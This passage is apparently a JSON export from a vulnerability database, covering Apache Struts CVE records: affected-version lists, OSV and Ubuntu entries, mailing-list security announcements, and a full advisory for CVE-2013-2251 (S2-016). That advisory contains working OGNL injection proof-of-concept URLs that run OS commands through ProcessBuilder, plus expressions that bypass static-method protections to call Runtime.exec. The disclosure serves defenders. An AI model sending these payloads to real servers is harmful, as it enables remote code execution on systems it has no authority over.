"cpe:2.3:a:apache:struts:2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:opensymphony:webwork:*:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.4:*:*:*:*:*:*:*"]}], "securityvulns": [{"lastseen": "2018-08-31T11:10:48", "description": "\r\n\r\nCVE Number: CVE-2013-2251\r\nTitle: Struts2 Prefixed Parameters OGNL Injection Vulnerability\r\nAffected Software: Apache Struts v2.0.0 - 2.3.15\r\nCredit: Takeshi Terada of Mitsui Bussan Secure Directions, Inc.\r\nIssue Status: v2.3.15.1 was released which fixes this vulnerability\r\nIssue ID by Vender: S2-016\r\n\r\nOverview:\r\n Struts2 is an open-source web application framework for Java.\r\n Struts2 (v2.0.0 - 2.3.15) is vulnerable to remote OGNL injection which\r\n leads to arbitrary Java method execution on the target server. This is\r\n caused by insecure handling of prefixed special parameters (action:,\r\n redirect: and redirectAction:) in DefaultActionMapper class of Struts2.\r\n\r\nDetails:\r\n <About DefaultActionMapper>\r\n\r\n Struts2's ActionMapper is a mechanism for mapping between incoming HTTP\r\n request and action to be executed on the server. DefaultActionMapper is\r\n a default implementation of ActionMapper. 
It handles four types of\r\n prefixed parameters: action:, redirect:, redirectAction: and method:.\r\n\r\n For example, redirect prefix is used for HTTP redirect.\r\n\r\n Normal redirect prefix usage in JSP:\r\n <s:form action="foo">\r\n ...\r\n <s:submit value="Register"/>\r\n <s:submit name="redirect:http://www.google.com/" value="Cancel"/>\r\n </s:form>\r\n\r\n If the cancel button is clicked, redirection is performed.\r\n\r\n Request URI for redirection:\r\n /foo.action?redirect:http://www.google.com/\r\n\r\n Response Header:\r\n HTTP/1.1 302 Found\r\n Location: http://www.google.com/\r\n\r\n Usage of other prefixed parameters is similar to redirect.\r\n See Struts2 document for details.\r\n https://cwiki.apache.org/confluence/display/WW/ActionMapper\r\n\r\n <How the Attack Works>\r\n\r\n As stated already, there are four types of prefixed parameters.\r\n\r\n action:, redirect:, redirectAction:, method:\r\n\r\n All except for method: can be used for attacks. But regarding action:,\r\n it can be used only if wildcard mapping is enabled in configuration.\r\n On the one hand, redirect: and redirectAction: are not constrained by\r\n configuration (thus they are convenient for attackers).\r\n\r\n One thing that should be noted is that prefixed parameters are quite\r\n forceful. It means that behavior of application which is not intended\r\n to accept prefixed parameters can also be overwritten by prefixed\r\n parameters added to HTTP request. Therefore all Struts2 applications\r\n that use DefaultActionMapper are vulnerable to the attack.\r\n\r\n The injection point is name of prefixed parameters.\r\n Example of attack using redirect: is shown below.\r\n\r\n Attack URI:\r\n /bar.action?redirect:http://www.google.com/%25{1000-1}\r\n\r\n Response Header:\r\n HTTP/1.1 302 Found\r\n Location: http://www.google.com/999\r\n\r\n As you can see, expression (1000-1) is evaluated and the result (999)\r\n appears in Location response header. 
As I shall explain later,\r\n more complex attacks such as OS command execution is possible too.\r\n\r\n In DefaultActionMapper, name of prefixed parameter is once stored as\r\n ActionMapping object and is later executed as OGNL expression.\r\n Rough method call flow in execution phase is as the following.\r\n\r\n org.apache.struts2.dispatcher.ng.filter.StrutsExecuteFilter.doFilter()\r\n org.apache.struts2.dispatcher.ng.ExecuteOperations.executeAction()\r\n org.apache.struts2.dispatcher.Dispatcher.serviceAction()\r\n org.apache.struts2.dispatcher.StrutsResultSupport.execute()\r\n org.apache.struts2.dispatcher.StrutsResultSupport.conditionalParse()\r\n com.opensymphony.xwork2.util.TextParseUtil.translateVariables()\r\n com.opensymphony.xwork2.util.OgnlTextParser.evaluate()\r\n\r\nProof of Concept:\r\n <PoC URLs>\r\n\r\n PoC is already disclosed on vender's web page.\r\n https://struts.apache.org/release/2.3.x/docs/s2-016.html\r\n\r\n Below PoC URLs are just quotes from the vender's page.\r\n\r\n Simple Expression:\r\n http://host/struts2-blank/example/X.action?action:%25{3*4}\r\n http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}\r\n\r\n OS Command Execution:\r\n http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}\r\n http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}\r\n http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}\r\n\r\n Obviously such attacks are not specific to blank/showcase application,\r\n but all Struts2 based applications may be subject to attacks.\r\n\r\n <OS Command Execution and Static Method Call>\r\n\r\n Another topic that I think worth mentioning is that PoC URLs use\r\n ProcessBuilder class to execute OS commands. 
The merit of using this\r\n class is that it does not require static method to execute OS commands,\r\n while Runtime class does require it.\r\n\r\n As you may know, static method call in OGNL is basically prohibited.\r\n But in Struts2 <= v2.3.14.1 this restriction was easily bypassed by\r\n a simple trick:\r\n\r\n %{#_memberAccess['allowStaticMethodAccess']=true,\r\n @java.lang.Runtime@getRuntime().exec('your commands')}\r\n\r\n In Struts v2.3.14.2, SecurityMemberAccess class has been changed to\r\n prevent the trick. However there are still some techniques to call\r\n static method in OGNL.\r\n\r\n One technique is to use reflection to replace static method call to\r\n instance method call. Another technique is to overwrite #_memberAccess\r\n object itself rather than property of the object:\r\n\r\n %{#_memberAccess=new com.opensymphony.xwork2.ognl.SecurityMemberAccess(true),\r\n @java.lang.Runtime@getRuntime().exec('your commands')}\r\n\r\n Probably prevention against static method is just an additional layer\r\n of defense, but I think that global objects such as #_memberAccess\r\n should be protected from rogue update.\r\n\r\nTimeline:\r\n 2013/06/24 Reported to Struts Security ML\r\n 2013/07/17 Vender announced v2.3.15.1\r\n 2013/08/10 Disclosure of this advisory\r\n\r\nRecommendation:\r\n Immediate upgrade to the latest version is strongly recommended as\r\n active attacks have already been observed. It should be noted that\r\n redirect: and redirectAction: parameters were completely dropped and\r\n do not work in the latest version as stated in the vender's page.\r\n Thus attention for compatibility issues is required for upgrade.\r\n\r\n If you cannot upgrade your Struts2 immediately, filtering (by custom\r\n servlet filter, IPS, WAF and so on) can be a mitigation solution for\r\n this vulnerability. 
Some points about filtering solution are listed\r\n below.\r\n\r\n - Both %{expr} and ${expr} notation can be used for attacks.\r\n - Parameters both in querystring and in request body can be used.\r\n - redirect: and redirectAction: can be used not only for Java method\r\n execution but also for open redirect.\r\n\r\n See S2-017 (CVE-2013-2248) for open redirect issue.\r\n https://struts.apache.org/release/2.3.x/docs/s2-017.html\r\n\r\nReference:\r\n https://struts.apache.org/release/2.3.x/docs/s2-016.html\r\n https://cwiki.apache.org/confluence/display/WW/ActionMapper\r\n\r\n", "cvss3": {}, "published": "2013-09-09T00:00:00", "type": "securityvulns", "title": "Struts2 Prefixed Parameters OGNL Injection Vulnerability", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2013-2248", "CVE-2013-2251"], "modified": "2013-09-09T00:00:00", "id": "SECURITYVULNS:DOC:29766", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29766", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\nAs confirmed in our last announcement, the Apache Struts 1 framework in\r\nall versions is affected by a ClassLoader manipulation vulnerability\r\n(CVE-2014-0114) similar to a recently fixed vulnerability in Struts 2\r\n(CVE-2014-0112, CVE-2014-0094) [1].\r\n\r\nThanks to the efforts of Alvaro Munoz and the HP Fortify team, the\r\nApache Struts project team can recommend a first mitigation that is\r\nrelatively simple to apply. It involves the introduction of a generic\r\nServlet filter, adding the possibility to blacklist unacceptable request\r\nparameters based on regular expressions. Please see the corresponding HP\r\nFortify blog entry [2] for detailed instructions.\r\n\r\nThe HP Fortify team also informed us that the vulnerability may be\r\nexploited for Remote Code Execution (RCE) in certain environments. 
Based\r\non this information, the Apache Struts project team recommends to apply\r\nthe mitigation advice *immediately* for all Struts 1 based applications.\r\n\r\nStruts 1 has had its End-Of-Life announcement more than one year ago\r\n[3]. However, in a cross project effort the Struts team is looking for a\r\ncorrection or an improved mitigation path. Please stay tuned for further\r\ninformation regarding a solution.\r\n\r\nThis is a cross-list posting. If you have questions regarding this\r\nreport, please direct them to security@struts.apache.org only.\r\n\r\n[1] http://struts.apache.org/release/2.3.x/docs/s2-021.html\r\n[2]\r\nhttp://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Protect-your-Struts1-applications/ba-p/6463188#.U2J7xeaSxro\r\n[3] http://struts.apache.org/struts1eol-announcement.html\r\n\r\n-- Rene Gielen http://twitter.com/rgielen\r\n\r\n", "cvss3": {}, "published": "2014-05-02T00:00:00", "type": "securityvulns", "title": "[ANN][SECURITY] Struts 1 - CVE-2014-0114 -Mitigation Advice Available, Possible RCE Impact", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2014-0114", "CVE-2014-0094", "CVE-2014-0112"], "modified": "2014-05-02T00:00:00", "id": "SECURITYVULNS:DOC:30529", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30529", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-06-08T19:13:33", "description": "Few ClassLoader manipulation vulnerabilities with potential RCE impact.", "cvss3": {}, "published": "2014-05-07T00:00:00", "type": "securityvulns", "title": "Apache Struts multiple security vulnerabilities", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2014-0114", "CVE-2014-0094", "CVE-2014-0112"], "modified": "2014-05-07T00:00:00", "id": "SECURITYVULNS:VULN:13701", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13701", "sourceData": "", "cvss": {"score": 7.5, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\nThe Apache Struts project team confirms that Struts 1 in all versions is\r\naffected by a ClassLoader manipulation vulnerability similar to a\r\nrecently fixed vulnerability in Struts 2 (CVE-2014-0112, CVE-2014-0094) [1].\r\n\r\nThis is a different underlying flaw. For future reference, please use\r\nCVE-2014-0114 in regards to this issue.\r\n\r\nStruts 1 has had its End-Of-Life announcement one year ago. In a cross\r\nproject effort, the Struts team is looking for a correction or\r\nmitigation path though. Please stay tuned for further information\r\nregarding a solution.\r\n\r\nThis is a cross-list posting. If you have questions regarding this\r\nreport, please direct them to security@struts.apache.org only.\r\n\r\n[1] http://struts.apache.org/release/2.3.x/docs/s2-021.html\r\n\r\n-- Rene Gielen http://twitter.com/rgielen\r\n\r\n", "cvss3": {}, "published": "2014-05-02T00:00:00", "type": "securityvulns", "title": "[ANN][SECURITY] ClassLoader manipulation issue confirmed for Struts 1 - CVE-2014-0114", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2014-0114", "CVE-2014-0094", "CVE-2014-0112"], "modified": "2014-05-02T00:00:00", "id": "SECURITYVULNS:DOC:30528", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30528", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-06-08T18:50:46", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "cvss3": {}, "published": "2011-05-11T00:00:00", "type": "securityvulns", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2011-1772"], "modified": "2011-05-11T00:00:00", "id": "SECURITYVULNS:VULN:11662", "href": 
"https://vulners.com/securityvulns/SECURITYVULNS:VULN:11662", "sourceData": "", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "osv": [{"lastseen": "2023-08-16T09:50:50", "description": "Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted action name that is not properly handled during wildcard matching, a different vulnerability than CVE-2013-2135.", "cvss3": {}, "published": "2022-05-14T01:57:02", "type": "osv", "title": "Arbitrary code execution in Apache Struts 2", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2134", "CVE-2013-2135"], "modified": "2023-08-16T09:48:09", "id": "OSV:GHSA-GQQM-564F-VVXQ", "href": "https://osv.dev/vulnerability/GHSA-gqqm-564f-vvxq", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-04-11T01:47:05", "description": "CookieInterceptor in Apache Struts 2.x before 2.3.20, when a wildcard cookiesName value is used, does not properly restrict access to the getClass method, which allows remote attackers to \"manipulate\" the ClassLoader and modify session state via a crafted request. 
NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-0113.", "cvss3": {}, "published": "2022-05-14T00:54:14", "type": "osv", "title": "ClassLoader manipulation in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0113", "CVE-2014-0116"], "modified": "2023-04-11T01:47:01", "id": "OSV:GHSA-HMHQ-382Q-MP56", "href": "https://osv.dev/vulnerability/GHSA-hmhq-382q-mp56", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-04-11T01:45:53", "description": "ParametersInterceptor in Apache Struts before 2.3.20 does not properly restrict access to the getClass method, which allows remote attackers to \"manipulate\" the ClassLoader and execute arbitrary code via a crafted request. 
NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-0094.", "cvss3": {}, "published": "2022-05-14T00:54:16", "type": "osv", "title": "ClassLoader manipulation in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0094", "CVE-2014-0112"], "modified": "2023-04-11T01:45:46", "id": "OSV:GHSA-PRJV-JJ26-WF8H", "href": "https://osv.dev/vulnerability/GHSA-prjv-jj26-wf8h", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-04-11T01:40:21", "description": "CookieInterceptor in Apache Struts before 2.3.20, when a wildcard cookiesName value is used, does not properly restrict access to the getClass method, which allows remote attackers to \"manipulate\" the ClassLoader and execute arbitrary code via a crafted request. 
NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-0094.", "cvss3": {}, "published": "2022-05-14T00:54:15", "type": "osv", "title": "ClassLoader manipulation in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0094", "CVE-2014-0113"], "modified": "2023-04-11T01:40:18", "id": "OSV:GHSA-3C5C-XRQ4-QHR8", "href": "https://osv.dev/vulnerability/GHSA-3c5c-xrq4-qhr8", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-04-11T01:42:59", "description": "When the Struts2 debug mode is turned on, under certain conditions an arbitrary script may be executed in the 'Problem Report' screen. Also if JSP files are exposed to be accessed directly it's possible to execute an arbitrary script. \n\nIt is generally not advisable to have debug mode switched on outside of the development environment. Debug mode should always be turned off in production setup. Also never expose JSPs files directly and hide them inside WEB-INF folder or define dedicated security constraints to block access to raw JSP files.\n\nStruts >= 2.3.20 is not vulnerable to this attack. 
We recommend upgrading to Struts 2.3.20 or higher.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2022-05-14T01:57:02", "type": "osv", "title": "Cross-site Scripting in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5169"], "modified": "2023-04-11T01:42:56", "id": "OSV:GHSA-VWHV-J36G-5RM8", "href": "https://osv.dev/vulnerability/GHSA-vwhv-j36g-5rm8", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-04-11T01:44:01", "description": "In Apache Struts 2.0.1 through 2.3.33 and 2.5 through 2.5.10, using an unintentional expression in a Freemarker tag instead of string literals can lead to a RCE attack.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-10-16T19:35:40", "type": "osv", 
"title": "Apache Struts 2.0.1 uses an unintentional expression in a Freemarker tag instead of string literal", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12611"], "modified": "2023-04-11T01:43:58", "id": "OSV:GHSA-8FX9-5HX8-CRHM", "href": "https://osv.dev/vulnerability/GHSA-8fx9-5hx8-crhm", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-07T23:31:14", "description": "Apache Struts 2.0.0 through 2.3.x before 2.3.20 uses predictable <s:token/> values, which allows remote attackers to bypass the CSRF protection mechanism.", "cvss3": {}, "published": "2022-05-14T02:50:59", "type": "osv", "title": "Cross-Site Request Forgery in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7809"], "modified": "2023-08-07T23:30:50", "id": "OSV:GHSA-H4V9-JF2R-9H6M", "href": "https://osv.dev/vulnerability/GHSA-h4v9-jf2r-9h6m", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-14T23:09:04", "description": "The token check mechanism in Apache 
Struts 2.0.0 through 2.3.4 does not properly validate the token name configuration parameter, which allows remote attackers to perform cross-site request forgery (CSRF) attacks by setting the token name configuration parameter to a session attribute.", "cvss3": {}, "published": "2022-05-17T01:42:17", "type": "osv", "title": "Cross-Site Request Forgery in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-4386"], "modified": "2023-08-14T23:01:17", "id": "OSV:GHSA-2RVH-Q539-Q33V", "href": "https://osv.dev/vulnerability/GHSA-2rvh-q539-q33v", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-15T20:18:47", "description": "The Struts 2 action mapping mechanism supports the special parameter prefix action: which is intended to help with attaching navigational information to buttons within forms, under certain conditions this can be used to bypass security constraints. \n\nIn Struts 2.3.15.3 the action mapping mechanism was changed to avoid circumventing security constraints. 
Two additional constants were introduced to steer behaviour of DefaultActionMapper:\n\n- struts.mapper.action.prefix.enabled - when set to false support for \"action:\" prefix is disabled, set to false by default\n- struts.mapper.action.prefix.crossNamespaces - when set to false, actions defined with \"action:\" prefix must be in the same namespace as current action\n\n", "cvss3": {}, "published": "2022-05-17T04:44:52", "type": "osv", "title": "Apache Struts2 Broken Access Control Vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4310"], "modified": "2023-08-15T19:19:17", "id": "OSV:GHSA-Q5Q8-JGHF-3PM3", "href": "https://osv.dev/vulnerability/GHSA-q5q8-jghf-3pm3", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2023-04-11T01:22:02", "description": "Multiple Cross-Site Scripting (XSS) in XWork generated error pages in Apache Struts. By default, XWork doesn't escape action's names in automatically generated error page, allowing for a successful XSS attack. When Dynamic Method Invocation (DMI) is enabled, the action name is generated dynamically based on request parameters. This allows to call non-existing page and method to produce error page with injected code as below. 
As of Struts 2.2.3 the action names are escaped when automatically generated error pages are rendered.", "cvss3": {}, "published": "2022-05-17T05:35:28", "type": "osv", "title": "Cross-site Scripting in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1772"], "modified": "2023-04-11T01:21:58", "id": "OSV:GHSA-56F8-G68R-J699", "href": "https://osv.dev/vulnerability/GHSA-56f8-g68r-j699", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-04-11T01:48:48", "description": "ValueStack defines special top object which represents root of execution context. It can be used to manipulate Struts' internals or can be used to affect container's settings. Applying better regex which includes pattern to exclude request parameters trying to use top object. 
This issue was patched in Struts 2.3.24.1.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-05-14T03:15:08", "type": "osv", "title": "Special top object can be used to access Struts' internals", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5209"], "modified": "2023-04-11T01:48:41", "id": "OSV:GHSA-4QGJ-9MVG-3929", "href": "https://osv.dev/vulnerability/GHSA-4qgj-9mvg-3929", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-08-17T16:34:45", "description": "OGNL provides, among other features, extensive expression evaluation capabilities. This vulnerability allows a malicious user to bypass the '#'-usage protection built into the ParametersInterceptor, thus being able to manipulate server side context objects. 
This behavior was already addressed in [S2-003](https://cwiki.apache.org/confluence/display/WW/S2-003), but it turned out that the resulting fix based on whitelisting acceptable parameter names closed the vulnerability only partially.", "cvss3": {}, "published": "2022-05-13T01:14:26", "type": "osv", "title": "Server side object manipulation in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1870"], "modified": "2023-08-17T16:34:11", "id": "OSV:GHSA-X5FC-PGPX-59J5", "href": "https://osv.dev/vulnerability/GHSA-x5fc-pgpx-59j5", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "ubuntucve": [{"lastseen": "2023-09-25T05:02:47", "description": "Apache Struts 2 before 2.3.14.3 allows remote attackers to execute\narbitrary OGNL code via a request with a crafted action name that is not\nproperly handled during wildcard matching, a different vulnerability than\nCVE-2013-2135.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[seth-arnold](<https://launchpad.net/~seth-arnold>) | Only affects Struts 2\n", "cvss3": {}, "published": "2013-07-16T00:00:00", "type": "ubuntucve", "title": "CVE-2013-2134", 